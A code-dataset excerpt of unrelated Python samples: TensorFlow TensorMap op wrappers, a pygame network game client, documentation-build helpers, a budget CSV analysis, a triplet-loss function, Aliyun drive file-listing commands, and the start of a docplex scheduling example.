    if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
      return result
    raise
  _result = _outputs[:]
  if _execute.must_record_gradient():
    _attrs = ("key_dtype", _op._get_attr_type("key_dtype"), "value_dtype",
              _op._get_attr_type("value_dtype"))
    _inputs_flat = _op.inputs
    _execute.record_gradient(
        "TensorMapErase", _inputs_flat, _attrs, _result)
  _result, = _result
  return _result
# Raw-op endpoint exposed as tf.raw_ops.TensorMapErase.
TensorMapErase = tf_export("raw_ops.TensorMapErase")(_ops.to_raw_op(tensor_map_erase))
# Pure-Python eager path used when the C fast path raises _FallbackException.
def tensor_map_erase_eager_fallback(input_handle, key, value_dtype, name, ctx):
  value_dtype = _execute.make_type(value_dtype, "value_dtype")
  _attr_key_dtype, (key,) = _execute.args_to_matching_eager([key], ctx, [])
  input_handle = _ops.convert_to_tensor(input_handle, _dtypes.variant)
  _inputs_flat = [input_handle, key]
  _attrs = ("key_dtype", _attr_key_dtype, "value_dtype", value_dtype)
  _result = _execute.execute(b"TensorMapErase", 1, inputs=_inputs_flat,
                             attrs=_attrs, ctx=ctx, name=name)
  if _execute.must_record_gradient():
    _execute.record_gradient(
        "TensorMapErase", _inputs_flat, _attrs, _result)
  _result, = _result
  return _result
# Machine-generated eager/graph wrapper for the TensorMapHasKey op (see the
# file header); regenerate from the C++ op definition, do not hand-edit.
@_dispatch.add_dispatch_list
@tf_export('tensor_map_has_key')
def tensor_map_has_key(input_handle, key, name=None):
  r"""Returns whether the given key exists in the map.
  input_handle: the input map
  key: the key to check
  has_key: whether the key is already in the map or not
  Args:
    input_handle: A `Tensor` of type `variant`.
    key: A `Tensor`.
    name: A name for the operation (optional).
  Returns:
    A `Tensor` of type `bool`.
  """
  _ctx = _context._context or _context.context()
  tld = _ctx._thread_local_data
  if tld.is_eager:
    # Eager mode: C fast path, then Python eager fallback, then dispatch.
    try:
      _result = pywrap_tfe.TFE_Py_FastPathExecute(
        _ctx, "TensorMapHasKey", name, input_handle, key)
      return _result
    except _core._NotOkStatusException as e:
      _ops.raise_from_not_ok_status(e, name)
    except _core._FallbackException:
      pass
    try:
      return tensor_map_has_key_eager_fallback(
          input_handle, key, name=name, ctx=_ctx)
    except _core._SymbolicException:
      pass  # Add nodes to the TensorFlow graph.
    except (TypeError, ValueError):
      result = _dispatch.dispatch(
            tensor_map_has_key, (), dict(input_handle=input_handle, key=key,
                                         name=name)
          )
      if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
        return result
      raise
  # Add nodes to the TensorFlow graph.
  try:
    _, _, _op, _outputs = _op_def_library._apply_op_helper(
        "TensorMapHasKey", input_handle=input_handle, key=key, name=name)
  except (TypeError, ValueError):
    result = _dispatch.dispatch(
          tensor_map_has_key, (), dict(input_handle=input_handle, key=key,
                                       name=name)
        )
    if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
      return result
    raise
  _result = _outputs[:]
  if _execute.must_record_gradient():
    _attrs = ("key_dtype", _op._get_attr_type("key_dtype"))
    _inputs_flat = _op.inputs
    _execute.record_gradient(
        "TensorMapHasKey", _inputs_flat, _attrs, _result)
  _result, = _result
  return _result
# Raw-op endpoint exposed as tf.raw_ops.TensorMapHasKey.
TensorMapHasKey = tf_export("raw_ops.TensorMapHasKey")(_ops.to_raw_op(tensor_map_has_key))
# Pure-Python eager path used when the C fast path raises _FallbackException.
def tensor_map_has_key_eager_fallback(input_handle, key, name, ctx):
  _attr_key_dtype, (key,) = _execute.args_to_matching_eager([key], ctx, [])
  input_handle = _ops.convert_to_tensor(input_handle, _dtypes.variant)
  _inputs_flat = [input_handle, key]
  _attrs = ("key_dtype", _attr_key_dtype)
  _result = _execute.execute(b"TensorMapHasKey", 1, inputs=_inputs_flat,
                             attrs=_attrs, ctx=ctx, name=name)
  if _execute.must_record_gradient():
    _execute.record_gradient(
        "TensorMapHasKey", _inputs_flat, _attrs, _result)
  _result, = _result
  return _result
# Machine-generated eager/graph wrapper for the TensorMapInsert op (see the
# file header); regenerate from the C++ op definition, do not hand-edit.
@_dispatch.add_dispatch_list
@tf_export('tensor_map_insert')
def tensor_map_insert(input_handle, key, value, name=None):
  r"""Returns a map that is the 'input_handle' with the given key-value pair inserted.
  input_handle: the original map
  output_handle: the map with key and value inserted
  key: the key to be inserted
  value: the value to be inserted
  Args:
    input_handle: A `Tensor` of type `variant`.
    key: A `Tensor`.
    value: A `Tensor`.
    name: A name for the operation (optional).
  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  tld = _ctx._thread_local_data
  if tld.is_eager:
    # Eager mode: C fast path, then Python eager fallback, then dispatch.
    try:
      _result = pywrap_tfe.TFE_Py_FastPathExecute(
        _ctx, "TensorMapInsert", name, input_handle, key, value)
      return _result
    except _core._NotOkStatusException as e:
      _ops.raise_from_not_ok_status(e, name)
    except _core._FallbackException:
      pass
    try:
      return tensor_map_insert_eager_fallback(
          input_handle, key, value, name=name, ctx=_ctx)
    except _core._SymbolicException:
      pass  # Add nodes to the TensorFlow graph.
    except (TypeError, ValueError):
      result = _dispatch.dispatch(
            tensor_map_insert, (), dict(input_handle=input_handle, key=key,
                                        value=value, name=name)
          )
      if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
        return result
      raise
  # Add nodes to the TensorFlow graph.
  try:
    _, _, _op, _outputs = _op_def_library._apply_op_helper(
        "TensorMapInsert", input_handle=input_handle, key=key, value=value,
                           name=name)
  except (TypeError, ValueError):
    result = _dispatch.dispatch(
          tensor_map_insert, (), dict(input_handle=input_handle, key=key,
                                      value=value, name=name)
        )
    if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
      return result
    raise
  _result = _outputs[:]
  if _execute.must_record_gradient():
    _attrs = ("key_dtype", _op._get_attr_type("key_dtype"), "value_dtype",
              _op._get_attr_type("value_dtype"))
    _inputs_flat = _op.inputs
    _execute.record_gradient(
        "TensorMapInsert", _inputs_flat, _attrs, _result)
  _result, = _result
  return _result
# Raw-op endpoint exposed as tf.raw_ops.TensorMapInsert.
TensorMapInsert = tf_export("raw_ops.TensorMapInsert")(_ops.to_raw_op(tensor_map_insert))
# Pure-Python eager path used when the C fast path raises _FallbackException.
def tensor_map_insert_eager_fallback(input_handle, key, value, name, ctx):
  _attr_key_dtype, (key,) = _execute.args_to_matching_eager([key], ctx, [])
  _attr_value_dtype, (value,) = _execute.args_to_matching_eager([value], ctx, [])
  input_handle = _ops.convert_to_tensor(input_handle, _dtypes.variant)
  _inputs_flat = [input_handle, key, value]
  _attrs = ("key_dtype", _attr_key_dtype, "value_dtype", _attr_value_dtype)
  _result = _execute.execute(b"TensorMapInsert", 1, inputs=_inputs_flat,
                             attrs=_attrs, ctx=ctx, name=name)
  if _execute.must_record_gradient():
    _execute.record_gradient(
        "TensorMapInsert", _inputs_flat, _attrs, _result)
  _result, = _result
  return _result
# Machine-generated eager/graph wrapper for the TensorMapLookup op (see the
# file header); regenerate from the C++ op definition, do not hand-edit.
@_dispatch.add_dispatch_list
@tf_export('tensor_map_lookup')
def tensor_map_lookup(input_handle, key, value_dtype, name=None):
  r"""Returns the value from a given key in a tensor map.
  input_handle: the input map
  key: the key to be looked up
  value: the value found from the given key
  Args:
    input_handle: A `Tensor` of type `variant`.
    key: A `Tensor`.
    value_dtype: A `tf.DType`.
    name: A name for the operation (optional).
  Returns:
    A `Tensor` of type `value_dtype`.
  """
  _ctx = _context._context or _context.context()
  tld = _ctx._thread_local_data
  if tld.is_eager:
    # Eager mode: C fast path, then Python eager fallback, then dispatch.
    try:
      _result = pywrap_tfe.TFE_Py_FastPathExecute(
        _ctx, "TensorMapLookup", name, input_handle, key, "value_dtype",
        value_dtype)
      return _result
    except _core._NotOkStatusException as e:
      _ops.raise_from_not_ok_status(e, name)
    except _core._FallbackException:
      pass
    try:
      return tensor_map_lookup_eager_fallback(
          input_handle, key, value_dtype=value_dtype, name=name, ctx=_ctx)
    except _core._SymbolicException:
      pass  # Add nodes to the TensorFlow graph.
    except (TypeError, ValueError):
      result = _dispatch.dispatch(
            tensor_map_lookup, (), dict(input_handle=input_handle, key=key,
                                        value_dtype=value_dtype, name=name)
          )
      if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
        return result
      raise
  # Add nodes to the TensorFlow graph.
  value_dtype = _execute.make_type(value_dtype, "value_dtype")
  try:
    _, _, _op, _outputs = _op_def_library._apply_op_helper(
        "TensorMapLookup", input_handle=input_handle, key=key,
        value_dtype=value_dtype, name=name)
  except (TypeError, ValueError):
    result = _dispatch.dispatch(
          tensor_map_lookup, (), dict(input_handle=input_handle, key=key,
                                      value_dtype=value_dtype, name=name)
        )
    if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
      return result
    raise
  _result = _outputs[:]
  if _execute.must_record_gradient():
    _attrs = ("key_dtype", _op._get_attr_type("key_dtype"), "value_dtype",
              _op._get_attr_type("value_dtype"))
    _inputs_flat = _op.inputs
    _execute.record_gradient(
        "TensorMapLookup", _inputs_flat, _attrs, _result)
  _result, = _result
  return _result
# Raw-op endpoint exposed as tf.raw_ops.TensorMapLookup.
TensorMapLookup = tf_export("raw_ops.TensorMapLookup")(_ops.to_raw_op(tensor_map_lookup))
# Pure-Python eager path used when the C fast path raises _FallbackException.
def tensor_map_lookup_eager_fallback(input_handle, key, value_dtype, name, ctx):
  value_dtype = _execute.make_type(value_dtype, "value_dtype")
  _attr_key_dtype, (key,) = _execute.args_to_matching_eager([key], ctx, [])
  input_handle = _ops.convert_to_tensor(input_handle, _dtypes.variant)
  _inputs_flat = [input_handle, key]
  _attrs = ("key_dtype", _attr_key_dtype, "value_dtype", value_dtype)
  _result = _execute.execute(b"TensorMapLookup", 1, inputs=_inputs_flat,
                             attrs=_attrs, ctx=ctx, name=name)
  if _execute.must_record_gradient():
    _execute.record_gradient(
        "TensorMapLookup", _inputs_flat, _attrs, _result)
  _result, = _result
  return _result
# Machine-generated eager/graph wrapper for the TensorMapSize op (see the
# file header); regenerate from the C++ op definition, do not hand-edit.
@_dispatch.add_dispatch_list
@tf_export('tensor_map_size')
def tensor_map_size(input_handle, name=None):
  r"""Returns the number of tensors in the input tensor map.
  input_handle: the input map
  size: the number of tensors in the map
  Args:
    input_handle: A `Tensor` of type `variant`.
    name: A name for the operation (optional).
  Returns:
    A `Tensor` of type `int32`.
  """
  _ctx = _context._context or _context.context()
  tld = _ctx._thread_local_data
  if tld.is_eager:
    # Eager mode: C fast path, then Python eager fallback, then dispatch.
    try:
      _result = pywrap_tfe.TFE_Py_FastPathExecute(
        _ctx, "TensorMapSize", name, input_handle)
      return _result
    except _core._NotOkStatusException as e:
      _ops.raise_from_not_ok_status(e, name)
    except _core._FallbackException:
      pass
    try:
      return tensor_map_size_eager_fallback(
          input_handle, name=name, ctx=_ctx)
    except _core._SymbolicException:
      pass  # Add nodes to the TensorFlow graph.
    except (TypeError, ValueError):
      result = _dispatch.dispatch(
            tensor_map_size, (), dict(input_handle=input_handle, name=name)
          )
      if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
        return result
      raise
  # Add nodes to the TensorFlow graph.
  try:
    _, _, _op, _outputs = _op_def_library._apply_op_helper(
        "TensorMapSize", input_handle=input_handle, name=name)
  except (TypeError, ValueError):
    result = _dispatch.dispatch(
          tensor_map_size, (), dict(input_handle=input_handle, name=name)
        )
    if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
      return result
    raise
  _result = _outputs[:]
  if _execute.must_record_gradient():
    _attrs = ()
    _inputs_flat = _op.inputs
    _execute.record_gradient(
        "TensorMapSize", _inputs_flat, _attrs, _result)
  _result, = _result
  return _result
# Raw-op endpoint exposed as tf.raw_ops.TensorMapSize.
TensorMapSize = tf_export("raw_ops.TensorMapSize")(_ops.to_raw_op(tensor_map_size))
# Pure-Python eager path used when the C fast path raises _FallbackException.
def tensor_map_size_eager_fallback(input_handle, name, ctx):
  input_handle = _ops.convert_to_tensor(input_handle, _dtypes.variant)
  _inputs_flat = [input_handle]
  _attrs = None
  _result = _execute.execute(b"TensorMapSize", 1, inputs=_inputs_flat,
                             attrs=_attrs, ctx=ctx, name=name)
  if _execute.must_record_gradient():
    _execute.record_gradient(
        "TensorMapSize", _inputs_flat, _attrs, _result)
  _result, = _result
  return _result
# Machine-generated eager/graph wrapper for the TensorMapStackKeys op (see
# the file header); regenerate from the C++ op definition, do not hand-edit.
@_dispatch.add_dispatch_list
@tf_export('tensor_map_stack_keys')
def tensor_map_stack_keys(input_handle, key_dtype, name=None):
  r"""Returns a Tensor stack of all keys in a tensor map.
  input_handle: the input map
  keys: the returned Tensor of all keys in the map
  Args:
    input_handle: A `Tensor` of type `variant`.
    key_dtype: A `tf.DType`.
    name: A name for the operation (optional).
  Returns:
    A `Tensor` of type `key_dtype`.
  """
  _ctx = _context._context or _context.context()
  tld = _ctx._thread_local_data
  if tld.is_eager:
    # Eager mode: C fast path, then Python eager fallback, then dispatch.
    try:
      _result = pywrap_tfe.TFE_Py_FastPathExecute(
        _ctx, "TensorMapStackKeys", name, input_handle, "key_dtype",
        key_dtype)
      return _result
    except _core._NotOkStatusException as e:
      _ops.raise_from_not_ok_status(e, name)
    except _core._FallbackException:
      pass
    try:
      return tensor_map_stack_keys_eager_fallback(
          input_handle, key_dtype=key_dtype, name=name, ctx=_ctx)
    except _core._SymbolicException:
      pass  # Add nodes to the TensorFlow graph.
    except (TypeError, ValueError):
      result = _dispatch.dispatch(
            tensor_map_stack_keys, (), dict(input_handle=input_handle,
                                            key_dtype=key_dtype, name=name)
          )
      if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
        return result
      raise
  # Add nodes to the TensorFlow graph.
  key_dtype = _execute.make_type(key_dtype, "key_dtype")
  try:
    _, _, _op, _outputs = _op_def_library._apply_op_helper(
        "TensorMapStackKeys", input_handle=input_handle, key_dtype=key_dtype,
                              name=name)
  except (TypeError, ValueError):
    result = _dispatch.dispatch(
          tensor_map_stack_keys, (), dict(input_handle=input_handle,
                                          key_dtype=key_dtype, name=name)
        )
    if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
      return result
    raise
  _result = _outputs[:]
  if _execute.must_record_gradient():
    _attrs = ("key_dtype", _op._get_attr_type("key_dtype"))
    _inputs_flat = _op.inputs
    _execute.record_gradient(
        "TensorMapStackKeys", _inputs_flat, _attrs, _result)
  _result, = _result
  return _result
# Raw-op endpoint exposed as tf.raw_ops.TensorMapStackKeys.
TensorMapStackKeys = tf_export("raw_ops.TensorMapStackKeys")(_ops.to_raw_op(tensor_map_stack_keys))
# Pure-Python eager path used when the C fast path raises _FallbackException.
def tensor_map_stack_keys_eager_fallback(input_handle, key_dtype, name, ctx):
  key_dtype = _execute.make_type(key_dtype, "key_dtype")
  input_handle = _ops.convert_to_tensor(input_handle, _dtypes.variant)
  _inputs_flat = [input_handle]
  _attrs = ("key_dtype", key_dtype)
  _result = _execute.execute(b"TensorMapStackKeys", 1, inputs=_inputs_flat,
                             attrs=_attrs, ctx=ctx, name=name)
  if _execute.must_record_gradient():
    _execute.record_gradient(
        "TensorMapStackKeys", _inputs_flat, _attrs, _result)
  _result, = _result
  return _result
| StarcoderdataPython |
9681391 | from json import load
import pygame
from pygame.locals import KEYDOWN, K_DOWN, K_LEFT, K_RIGHT, K_UP, QUIT
from quicknet.client import QClient
# Load user settings (server address, port, window size) once at startup.
with open('settings.json') as file:
    SETTINGS = load(file)
SELF = None      # our own player id, assigned by the server's WELCOME message
RUN = True       # main-loop flag; cleared when the window is closed
PLAYERS = {}     # player id -> [x, y] position, kept in sync by server events
game_client = QClient(SETTINGS["ip_addr"], SETTINGS["port"])
@game_client.on("WELCOME")
def welcome_client(msg, id, players):
    """Handle the server's WELCOME: adopt our player id and the roster."""
    # NOTE(review): the `id` parameter shadows the builtin; the name is part
    # of the callback signature, so it is kept as-is.
    global PLAYERS, SELF
    print(msg)
    PLAYERS = players
    SELF = id
@game_client.on("PLAYER_MOVED")
def move_player(player_name, xy):
    """Record *player_name*'s new position as broadcast by the server."""
    PLAYERS[player_name] = xy
@game_client.on("NEW_PLAYER")
def new_player(player_name, xy):
    """Register a newly joined player at position *xy*."""
    print("New Player!", player_name)
    PLAYERS[player_name] = xy
pygame.init()
screen = pygame.display.set_mode(SETTINGS["window_size"])
pygame.display.set_caption("My ONLINE game!")
clock = pygame.time.Clock()
game_client.start()
print("Started socket client")
# Main loop: pump events, forward movement requests to the server, then
# redraw the roster that the network callbacks above keep up to date.
# The client only *sends* a direction; positions come back via PLAYER_MOVED.
while RUN:
    for event in pygame.event.get():
        if event.type == QUIT:
            print("Exiting")
            RUN = False
            game_client.quit()
        elif event.type == KEYDOWN:
            if event.key == K_UP:
                game_client.call("MOVE", "UP")
            elif event.key == K_LEFT:
                game_client.call("MOVE", "LEFT")
            elif event.key == K_RIGHT:
                game_client.call("MOVE", "RIGHT")
            elif event.key == K_DOWN:
                game_client.call("MOVE", "DOWN")
    screen.fill((0, 0, 0))  # Clear the screen
    for player, rect in PLAYERS.items():
        if player == SELF:
            # Our own 50x50 square is drawn grey...
            r = pygame.Rect(rect[0], rect[1], 50, 50)
            pygame.draw.rect(screen, (100, 100, 100), r)
        else:
            # ...all other players are drawn pink.
            r = pygame.Rect(rect[0], rect[1], 50, 50)
            pygame.draw.rect(screen, (200, 100, 200), r)
    pygame.display.flip()
    clock.tick(30)  # cap the loop at 30 FPS
game_client.quit()
| StarcoderdataPython |
9666307 | <reponame>pazamelin/openvino
from jinja2 import Template
from os import path, remove
from shutil import rmtree
def create_content(template: str, notebooks_data: dict, file_name: str):
    """Render the jinja *template* with *notebooks_data*.

    A ``notebook`` key is injected into *notebooks_data* first, derived
    from *file_name* by dropping its last two dash-separated parts
    (e.g. the ``with-output.rst`` suffix).

    :param template: jinja template that will be filled with notebook data
    :param notebooks_data: data used to fill the template
    :param file_name: notebook file name
    :returns: the rendered template
    """
    compiled = Template(template)
    notebooks_data["notebook"] = "-".join(file_name.split("-")[:-2])
    return compiled.render(notebooks_data)
def add_content_below(text: str, path: str, line=3) -> bool:
    """Insert *text* into the file at *path* before line number *line*.

    Used to add extra content (like a binder button) to an existing rst
    file.  Returns True on success, False when the file does not exist.

    :param text: text inserted into the rst file
    :param path: path to the modified file
    :param line: line number at which content is added (default 3)
    """
    try:
        with open(path, "r+", encoding="utf-8") as rst_file:
            contents = rst_file.readlines()
            contents[line:line] = text
            rst_file.seek(0)
            rst_file.writelines(contents)
    except FileNotFoundError:
        return False
    return True
def load_secret(path: str = "../.secret") -> str:
    """Return the stripped first line of the secret file at *path*.

    The file is opened read-only ("r"); the previous "r+" mode needlessly
    required write permission on the secret file, failing e.g. when the
    secret is mounted read-only.

    :param path: Path to secret file. Defaults to "../.secret".
    :returns: Secret key
    """
    with open(path, "r") as file:
        return file.readline().strip()
def process_notebook_name(notebook_name: str) -> str:
    """Convert a notebook file name into a short display name.

    "001-hello-world-with-output.rst" -> "001.hello world": the
    three-digit prefix, a dot (no following space), then the
    dash-separated words with the trailing two parts (the
    "with-output" suffix) removed.

    :param notebook_name: name following the [3 digits]-words-with-output.rst
        convention
    :returns: the processed display name
    """
    prefix = notebook_name[:3]
    stem = notebook_name[4:].split(".")[0]
    words = stem.split("-")[:-2]
    return prefix + "." + " ".join(words)
def find_latest_artifact(artifacts_dict: dict, name: str = "rst_files") -> int:
    """Return the highest id among artifacts whose name equals *name*.

    :param artifacts_dict: fetched GitHub Actions artifacts payload
    :param name: name of the searched artifact (default "rst_files")
    :returns: id of the latest matching artifact
    """
    matching_ids = (
        artifact["id"]
        for artifact in artifacts_dict["artifacts"]
        if artifact["name"] == name
    )
    return max(matching_ids)
def verify_notebook_name(notebook_name: str) -> bool:
    """Check that *notebook_name* follows the naming convention.

    A valid name starts with three digits and has an ".rst" extension,
    e.g. "001-hello-world-with-output.rst".

    :param notebook_name: name to validate
    :returns: True when the name meets the requirements
    """
    return notebook_name.endswith(".rst") and notebook_name[:3].isdigit()
def generate_artifact_link(owner: str, name: str) -> str:
    """Build the GitHub API URL for listing a repository's action artifacts.

    :param owner: GitHub repo owner name
    :param name: GitHub repo name
    :returns: API link for downloading artifacts
    """
    return "https://api.github.com/repos/{}/{}/actions/artifacts".format(owner, name)
def remove_existing(notebooks_path: str) -> None:
    """Delete *notebooks_path* if it exists (file or whole directory tree).

    :param notebooks_path: path to the file or directory to be removed
    """
    if not path.exists(notebooks_path):
        return
    if path.isdir(notebooks_path):
        rmtree(notebooks_path)
    else:
        remove(notebooks_path)
def split_notebooks_into_sections(notebooks: list) -> list:
    """Bucket notebooks into five series by the leading digit of their name.

    A notebook named "3xx-..." lands in ``series[3]``.  Notebooks whose
    name is empty, does not start with a digit, or starts with a digit
    outside 0-4 are silently skipped.  (Previously a non-digit first
    character raised an uncaught ValueError; digits 5-9 were only skipped
    incidentally via the IndexError handler.)

    :param notebooks: objects exposing a ``name`` attribute
    :returns: list of five lists of notebooks
    """
    series = [[] for _ in range(5)]
    for notebook in notebooks:
        try:
            section = int(notebook.name[0])
        except (IndexError, ValueError):
            continue  # empty or non-numeric name
        if section < len(series):
            series[section].append(notebook)
    return series
209201 | #!/usr/bin/env python
# coding: utf-8
# Pybank Financial Analysis
import os
import csv

# Input CSV and output report locations (relative to the working directory).
csvpath = os.path.join('Resources', 'budget_data.csv')
analysis = os.path.join('analysis', 'Analysis.txt')


def read_budget(path):
    """Read the budget CSV and return parallel lists ``(months, revenue)``.

    The file is expected to contain a header row followed by
    ``<month>,<revenue>`` rows; revenue values are parsed as ints.
    """
    months = []
    revenue = []
    with open(path) as csvfile:
        csvreader = csv.reader(csvfile, delimiter=',')
        next(csvreader)  # skip the header row
        for row in csvreader:
            months.append(row[0])
            revenue.append(int(row[1]))
    return months, revenue


def analyze(months, revenue):
    """Compute the report statistics from parallel month/revenue lists.

    Returns:
        (count, total, avg_change, inc_date, inc_amount, dec_date, dec_amount)

    Month-over-month changes are computed for every consecutive pair.
    (The original used a ``prev_rev != 0`` sentinel, which silently skipped
    the change following any month whose revenue was exactly 0.)
    """
    count = len(months)
    total = sum(revenue)
    changes = [curr - prev for prev, curr in zip(revenue, revenue[1:])]
    avg = round(sum(changes) / len(changes), 2)
    g_inc = max(changes)
    # Change i is the delta *into* month i+1, hence the +1 offsets below.
    date1 = months[changes.index(g_inc) + 1]
    g_dec = min(changes)
    date2 = months[changes.index(g_dec) + 1]
    return count, total, avg, date1, g_inc, date2, g_dec


def format_report(count, total, avg, date1, g_inc, date2, g_dec):
    """Render the analysis results as the multi-line report text."""
    return "\n".join([
        "Financial Analysis",
        "---------------------------",
        f"Total Months: {count}",
        f"Total Revenue: ${total}",
        f"Average Change: ${avg}",
        f"The Greatest Increase in Profits: {date1} (${g_inc})",
        f"The Greatest Decrease in Profits: {date2} (${g_dec})",
    ])


def main():
    """Run the analysis: print the report and write it to the analysis file."""
    months, revenue = read_budget(csvpath)
    report = format_report(*analyze(months, revenue))
    print(report)
    with open(analysis, 'w') as out:
        out.write(report + "\n")


# Guarded so importing this module (e.g. for testing) does no file I/O.
if __name__ == "__main__":
    main()
| StarcoderdataPython |
147639 | <filename>mlcomp/contrib/criterion/triplet.py<gh_stars>100-1000
import torch
import torch.nn.functional as F
from catalyst.contrib.nn.criterion.functional import cosine_distance, \
batch_all, _EPS
def triplet_loss(
    embeddings: torch.Tensor, labels: torch.Tensor, margin: float = 0.3,
    reduction='mean'
) -> torch.Tensor:
    """Batch-all triplet loss over pairwise cosine distances.

    Args:
        embeddings: batch of embedding vectors.
        labels: class label per embedding.
        margin: margin added to (positive - negative) distance gaps.
        reduction: 'mean' averages over triplets with loss > _EPS,
            'none' returns one summed value per anchor row.

    Raises:
        Exception: for any other reduction name.
    """
    pairwise = cosine_distance(embeddings)
    # Mask from batch_all — presumably 1 for valid (anchor, positive,
    # negative) index triples; confirm against catalyst docs.
    valid_mask = batch_all(labels)
    # Broadcast pairwise distances into a (a, p, n) difference cube.
    pos_dist = pairwise.unsqueeze(2)
    neg_dist = pairwise.unsqueeze(1)
    losses = F.relu(pos_dist - neg_dist + margin) * valid_mask
    if reduction == 'mean':
        # Average only over triplets that actually contribute loss.
        num_active = (losses > _EPS).sum().float()
        return losses.sum() / (num_active + _EPS)
    if reduction == 'none':
        return losses.sum(dim=[1, 2])
    raise Exception(f'Unknown reduction scheme {reduction}')
| StarcoderdataPython |
3537160 | <filename>alipcs_py/commands/list_files.py
from typing import Optional, List
from alipcs_py.alipcs import AliPCSApi
from alipcs_py.alipcs.inner import PcsFile
from alipcs_py.common.path import join_path
from alipcs_py.commands.log import get_logger
from alipcs_py.commands.sifter import Sifter, sift
from alipcs_py.commands.display import display_files
from rich import print
logger = get_logger(__name__)
DEFAULT_MAX_WORKERS = 10
def list_file(
    api: AliPCSApi,
    remotepath: str,
    file_id: Optional[str] = None,
    share_id: Optional[str] = None,
    share_token: Optional[str] = None,
    desc: bool = False,
    name: bool = False,
    time: bool = False,
    size: bool = False,
    all: bool = False,
    limit: int = 100,
    url_expire_sec: int = 7200,
    recursive: bool = False,
    sifters: Optional[List[Sifter]] = None,
    highlight: bool = False,
    rapiduploadinfo_file: Optional[str] = None,
    user_id: Optional[str] = None,
    user_name: Optional[str] = None,
    show_size: bool = False,
    show_date: bool = False,
    show_file_id: bool = False,
    show_hash: bool = False,
    show_absolute_path: bool = False,
    show_dl_link: bool = False,
    csv: bool = False,
    only_dl_link: bool = False,
):
    """List one remote path (or file id), optionally recursing into
    sub-directories.

    The target is resolved by `file_id` when given, otherwise by
    `remotepath`. Directories are expanded via `api.list_path`; entries
    are filtered through `sifters` and displayed with `display_files`.
    With `only_dl_link` only the download URLs are printed.

    Returns None; silently returns when the target cannot be resolved
    or nothing survives sifting.
    """
    # Fix: the original used a mutable default argument (`sifters=[]`).
    sifters = sifters if sifters is not None else []

    pcs_file: Optional[PcsFile]
    if file_id:
        metas = api.meta(file_id, share_id=share_id, share_token=share_token)
        # Guard against an empty meta result instead of raising IndexError.
        pcs_file = metas[0] if metas else None
    else:
        pcs_file = api.path(remotepath, share_id=share_id, share_token=share_token)
    if not pcs_file:
        return

    is_dir = pcs_file.is_dir
    if is_dir:
        pcs_files = api.list_path(
            remotepath,
            file_id=pcs_file.file_id,
            share_id=share_id,
            share_token=share_token,
            desc=desc,
            name=name,
            time=time,
            size=size,
            all=all,
            limit=limit,
            url_expire_sec=url_expire_sec,
        )
    else:
        pcs_files = [pcs_file]

    pcs_files = sift(pcs_files, sifters, recursive=recursive)
    if not pcs_files:
        return

    # `only_dl_link` is loop-invariant; hoisted out of the original loop.
    if show_dl_link and only_dl_link:
        for entry in pcs_files:
            print(entry.download_url)

    if not only_dl_link:
        display_files(
            pcs_files,
            remotepath,
            sifters=sifters,
            highlight=highlight,
            show_size=show_size,
            show_date=show_date,
            show_file_id=show_file_id,
            show_hash=show_hash,
            show_absolute_path=show_absolute_path,
            show_dl_link=show_dl_link,
            csv=csv,
        )

    # Recurse into child directories with the same options.
    if is_dir and recursive:
        for entry in pcs_files:
            if entry.is_dir:
                list_file(
                    api,
                    join_path(remotepath, entry.name),
                    file_id=entry.file_id,
                    share_id=share_id,
                    share_token=share_token,
                    desc=desc,
                    name=name,
                    time=time,
                    size=size,
                    all=all,
                    limit=limit,
                    url_expire_sec=url_expire_sec,
                    recursive=recursive,
                    sifters=sifters,
                    highlight=highlight,
                    rapiduploadinfo_file=rapiduploadinfo_file,
                    user_id=user_id,
                    user_name=user_name,
                    show_size=show_size,
                    show_date=show_date,
                    show_file_id=show_file_id,
                    show_hash=show_hash,
                    show_absolute_path=show_absolute_path,
                    show_dl_link=show_dl_link,
                    csv=csv,
                    only_dl_link=only_dl_link,
                )
def list_files(
    api: AliPCSApi,
    *remotepaths: str,
    file_ids: Optional[List[str]] = None,
    share_id: Optional[str] = None,
    share_token: Optional[str] = None,
    desc: bool = False,
    name: bool = False,
    time: bool = False,
    size: bool = False,
    all: bool = False,
    limit: int = 100,
    url_expire_sec: int = 7200,
    recursive: bool = False,
    sifters: Optional[List[Sifter]] = None,
    highlight: bool = False,
    rapiduploadinfo_file: Optional[str] = None,
    user_id: Optional[str] = None,
    user_name: Optional[str] = None,
    show_size: bool = False,
    show_date: bool = False,
    show_file_id: bool = False,
    show_hash: bool = False,
    show_absolute_path: bool = False,
    show_dl_link: bool = False,
    csv: bool = False,
    only_dl_link: bool = False,
):
    """List every given remote path and file id via `list_file`.

    All options are forwarded unchanged to `list_file`; file ids are
    listed after paths, each with an empty `remotepath`.
    """
    # Fix: the original used mutable default arguments
    # (`file_ids=[]`, `sifters=[]`).
    sifters = sifters if sifters is not None else []

    # Collect the options once instead of duplicating the 20+ keyword
    # arguments in two call sites (the original repeated them verbatim).
    common = dict(
        share_id=share_id,
        share_token=share_token,
        desc=desc,
        name=name,
        time=time,
        size=size,
        all=all,
        limit=limit,
        url_expire_sec=url_expire_sec,
        recursive=recursive,
        sifters=sifters,
        highlight=highlight,
        rapiduploadinfo_file=rapiduploadinfo_file,
        user_id=user_id,
        user_name=user_name,
        show_size=show_size,
        show_date=show_date,
        show_file_id=show_file_id,
        show_hash=show_hash,
        show_absolute_path=show_absolute_path,
        show_dl_link=show_dl_link,
        csv=csv,
        only_dl_link=only_dl_link,
    )

    for rp in remotepaths:
        list_file(api, rp, **common)

    for fid in (file_ids or []):
        list_file(api, "", file_id=fid, **common)
| StarcoderdataPython |
6451164 | # --------------------------------------------------------------------------
# Source file provided under Apache License, Version 2.0, January 2004,
# http://www.apache.org/licenses/
# (c) Copyright IBM Corp. 2015, 2016
# --------------------------------------------------------------------------
"""
Problem Description
-------------------
The Stochastic Job-Shop Scheduling problem is a variant of the classical
deterministic Job-Shop Scheduling problem (see sched_jobshop.cpp) where
the duration of operations is uncertain.
Scenarios
---------
